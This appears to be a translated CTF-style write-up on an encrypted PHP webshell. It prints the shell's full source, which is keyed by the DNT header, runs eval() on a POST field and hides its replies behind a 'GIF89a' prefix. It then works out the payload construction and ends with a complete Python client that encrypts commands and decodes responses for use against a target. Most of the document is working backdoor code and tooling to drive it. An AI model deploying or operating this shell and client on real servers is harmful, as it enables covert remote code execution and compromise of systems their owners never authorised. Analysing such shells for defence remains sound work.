Let me paste the code first.
<?php
// The key for the custom cipher comes from the request's DNT header
// (@ silences the notice when the header is absent).
$k = @$_SERVER["HTTP_DNT"];
$d = $p = '';
// Every POST value is concatenated, so the field name is irrelevant.
foreach ($_POST as $a => $b) $d .= $b;
// Decode order: eccode DECODE -> gzuncompress -> unserialize.
$t = eccode($d, 'DECODE', $k);
$t = gzuncompress($t);
$p = unserialize($t);
$_POST = $p;
// Strip a trailing "<non-word char>die();" from the decoded z0, keeping the non-word char.
$_POST['z0'] = base64_encode(preg_replace('/(\W){1}die\(\);$/', '\1', base64_decode($_POST['z0'])));
ob_start();
$I1 = @$_POST['a'];
eval($I1);   // the PHP sent in 'a' runs here; its output is buffered
$body = ob_get_contents();
ob_end_clean();
@header("Content-type: image/gif");
// Reply: 'GIF89a' prefix + eccode(gzcompress(output), 'ENCODE', $k)
exit('GIF89a' . eccode(gzcompress($body), 'ENCODE', $k));

// Byte-wise add/subtract of the key, then URL-safe base64 without '=' padding.
// Note the key index ($e % strlen($c)) - 1: position 0 uses the LAST key byte.
// (PHP hoists function declarations, so calling eccode() above this definition is fine.)
function eccode($a, $b = 'DECODE', $c = 'Microsoft') {
    $d = null;
    if ($b == 'ENCODE') {
        for ($e = 0; $e < strlen($a); $e++) {
            $f = substr($a, $e, 1);
            $g = substr($c, ($e % strlen($c)) - 1, 1);
            $f = chr(ord($f) + ord($g));
            $d .= $f;
        }
        $d = base64_encode($d);
        $d = str_replace(array('+', '/', '='), array('-', '_', ''), $d);
    } elseif ($b == 'DECODE') {
        $h = str_replace(array('-', '_'), array('+', '/'), $a);
        // Restore the base64 padding that ENCODE stripped.
        $j = strlen($h) % 4;
        if ($j) {
            $h .= substr('====', $j);
        }
        $a = base64_decode($h);
        for ($e = 0; $e < strlen($a); $e++) {
            $f = substr($a, $e, 1);
            $g = substr($c, ($e % strlen($c)) - 1, 1);
            $f = chr(ord($f) - ord($g));
            $d .= $f;
        }
    }
    return $d;
}
Since the shell already contains both the encode and decode routines, the easiest approach is to use the shell's own eccode() to encrypt the data, then send it in and let the shell decrypt it.
$t = eccode($d, 'DECODE', $k);
$t = gzuncompress($t);
$p = unserialize($t);
Those three lines are the decryption order; to build the payload, apply them bottom to top, which gives:
eccode(gzcompress(serialize($data)), 'ENCODE', $k);
Then look at:
$_POST['z0'] = base64_encode(preg_replace('/(\W){1}die\(\);$/', '\1', base64_decode($_POST['z0'])));
...
$I1 = @$_POST['a'];
The POST array needs two entries, a and z0. Only a is used (it is what gets eval'd); z0 is not used after the preg_replace line, but it is given a value that matches the regex. (Strictly, a non-matching value is harmless too, since preg_replace returns its subject unchanged when nothing matches.) So build an array and serialize it:
eccode(gzcompress(serialize(array('a'=>'phpinfo();','z0'=>base64_encode(chr(2).'die();')))), 'ENCODE', $k);
The chr(2) here is there to satisfy the (\W){1} part of the regex: any non-word character works, and the regex keeps it while stripping the trailing die();.
Send it with Burp Suite: generate the payload, POST it to the shell (under any field name, since the shell concatenates every POST value) with the key in the DNT header, take the encrypted response, and run it back through the shell's own function to read the result.
The response is 'GIF89a' followed by eccode(gzcompress($body), 'ENCODE', $k), so decoding is the reverse: strip the six-byte GIF89a prefix, eccode(..., 'DECODE', $k), then gzuncompress.
One thing to watch: the DNT header must actually be present on the request. With no header $k is null, strlen($c) is 0, and the % in eccode fails (a DivisionByZeroError on PHP 7 and later), so nothing decrypts.
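Here is the whole client side in one place, as an added example that is not from the original post: a Python port of eccode() plus a minimal serialize()/unserialize() for the flat array, so you can build the payload, check locally what the shell will see, and decode the 'GIF89a' reply without a PHP interpreter. The key `secret`, the sample code `phpinfo();`, and the offline reply are constructed for the demo; the field name `x` is arbitrary because the shell concatenates every POST value.

```python
"""Client for the DNT-keyed webshell above: build the encrypted POST body and
decode the GIF-wrapped reply. Added example, not the original post's code;
it ports eccode() to Python so no PHP interpreter is needed."""
import base64
import re
import zlib


def _key_stream(key: bytes, length: int) -> bytes:
    """Key byte used at each position. The shell indexes the key with
    ($e % strlen($c)) - 1, so position 0 uses the LAST key byte; Python's
    negative index reproduces that quirk exactly."""
    if not key:
        raise ValueError("empty key: the shell's eccode() would hit modulo by zero")
    return bytes(key[(i % len(key)) - 1] for i in range(length))


def eccode_encode(data: bytes, key: bytes) -> str:
    """Port of eccode($a, 'ENCODE', $c): add the key byte-wise (mod 256),
    then URL-safe base64 with the '=' padding stripped."""
    ks = _key_stream(key, len(data))
    mixed = bytes((b + k) & 0xFF for b, k in zip(data, ks))
    return base64.urlsafe_b64encode(mixed).decode().rstrip("=")


def eccode_decode(text: str, key: bytes) -> bytes:
    """Port of eccode($a, 'DECODE', $c): restore padding, base64-decode,
    subtract the key byte-wise."""
    raw = base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))
    ks = _key_stream(key, len(raw))
    return bytes((b - k) & 0xFF for b, k in zip(raw, ks))


def php_serialize(arr: dict) -> bytes:
    """serialize() for a flat array of string keys and string values, which is
    all this shell needs (numeric-string keys would serialize as ints in PHP)."""
    out = [b"a:%d:{" % len(arr)]
    for k, v in arr.items():
        kb, vb = k.encode(), v.encode()
        out.append(b's:%d:"%s";s:%d:"%s";' % (len(kb), kb, len(vb), vb))
    out.append(b"}")
    return b"".join(out)


def php_unserialize_flat(data: bytes) -> dict:
    """Minimal inverse of php_serialize(), used to mirror the shell's side locally."""
    brace = data.index(b"{")
    count = int(data[2:brace - 1])

    def read_str(p: int):
        assert data[p:p + 2] == b"s:", "expected a string at offset %d" % p
        colon = data.index(b":", p + 2)
        n = int(data[p + 2:colon])
        start = colon + 2                  # skip ':"'
        assert data[start + n:start + n + 2] == b'";'
        return data[start:start + n].decode(), start + n + 2

    pos, result = brace + 1, {}
    for _ in range(count):
        k, pos = read_str(pos)
        v, pos = read_str(pos)
        result[k] = v
    return result


def build_payload(php_code: str, key: bytes) -> str:
    """eccode(gzcompress(serialize($data)), 'ENCODE', $k), the order derived
    in the post. z0 is unused by the eval path; a non-word byte + die();
    mirrors the post so the shell's preg_replace has something to strip."""
    data = {"a": php_code,
            "z0": base64.b64encode(b"\x02" + b"die();").decode()}
    return eccode_encode(zlib.compress(php_serialize(data)), key)   # gzcompress == zlib format


def shell_side_decode(payload: str, key: bytes) -> dict:
    """What the shell does on receipt (DECODE -> gzuncompress -> unserialize ->
    z0 regex). Lets you confirm a payload round-trips before sending it."""
    post = php_unserialize_flat(zlib.decompress(eccode_decode(payload, key)))
    z0 = base64.b64decode(post["z0"])
    post["z0"] = base64.b64encode(re.sub(rb"(\W)die\(\);$", rb"\1", z0)).decode()
    return post


def shell_side_reply(output: bytes, key: bytes) -> bytes:
    """Builds what the shell sends for a given eval() output, for offline testing."""
    return b"GIF89a" + eccode_encode(zlib.compress(output), key).encode()


def decode_response(body: bytes, key: bytes) -> bytes:
    """The shell replies 'GIF89a' . eccode(gzcompress($output), 'ENCODE', $k)."""
    if not body.startswith(b"GIF89a"):
        raise ValueError("no GIF89a prefix: wrong key, PHP error, or not this shell")
    return zlib.decompress(eccode_decode(body[6:].decode(), key))


if __name__ == "__main__":
    KEY = b"secret"                       # constructed: send it as the DNT header
    payload = build_payload("phpinfo();", KEY)
    print("DNT: " + KEY.decode())
    print("POST body: x=" + payload)      # any field name: the shell concatenates all POST values
    print("shell sees:", shell_side_decode(payload, KEY))
    # A reply built with the shell's own formula, so decode_response() can be shown offline.
    print("decoded reply:", decode_response(shell_side_reply(b"<h1>phpinfo</h1>", KEY), KEY))
```

The payload is URL-safe base64, so it can go straight into a form-urlencoded body; only the DNT header has to be added by hand in Burp. Running shell_side_decode() on the payload first is a cheap way to catch a wrong key or a serialize mistake before touching the target.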